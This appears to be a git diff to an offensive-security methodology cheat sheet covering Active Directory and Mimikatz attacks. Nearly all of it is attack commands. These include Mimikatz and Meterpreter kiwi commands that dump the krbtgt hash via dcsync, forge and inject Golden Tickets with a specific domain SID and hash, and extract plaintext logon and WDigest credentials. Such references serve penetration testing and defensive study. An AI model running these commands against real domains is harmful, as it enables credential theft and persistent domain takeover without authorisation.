diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 1b1c31c..b663a6e 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -44,26 +44,31 @@ Metasploit : windows/gather/credentials/domain_hashdump ``` - * Golden Tickets + * Golden Tickets + Mimikatz version ```c Get info - Mimikatz lsadump::dcsync /user:krbtgt lsadump::lsa /inject /name:krbtgt - Get info - Meterpreter(kiwi) - dcsync_ntlm krbtgt - Forge a Golden ticket - Mimikatz kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /ticket:evil.tck /ptt kerberos::tgt + ``` - Forge a Golden ticket - Metasploit - post/windows/escalate/golden_ticket + Meterpreter version + ```c + Get info - Meterpreter(kiwi) + dcsync_ntlm krbtgt + dcsync krbtgt Forge a Golden ticket - Meterpreter load kiwi + golden_ticket_create -d -k -s -u -t golden_ticket_create -d pentestlab.local -u pentestlabuser -s S-1-5-21-3737340914-2019594255-2413685307 -k d125e4f69c851529045ec95ca80fa37e -t /root/Downloads/pentestlabuser.tck + kerberos_ticket_purge kerberos_ticket_use /root/Downloads/pentestlabuser.tck + kerberos_ticket_list ``` * Kerberoast ```c @@ -87,6 +92,7 @@ ``` load mimikatz mimikatz_command -f sekurlsa::logonPasswords full +mimikatz_command -f sekurlsa::wdigest ``` ## PowerSploit diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md index 71f619d..4aa836d 100644 --- a/Methodology and Resources/Windows - Mimikatz.md +++ b/Methodology and Resources/Windows - Mimikatz.md @@ -13,6 +13,7 @@ Mimikatz console (multiple commands) PS C:\temp\mimikatz> .\mimikatz mimikatz # privilege::debug mimikatz # sekurlsa::logonpasswords +mimikatz # sekurlsa::wdigest ``` Mimikatz Golden ticket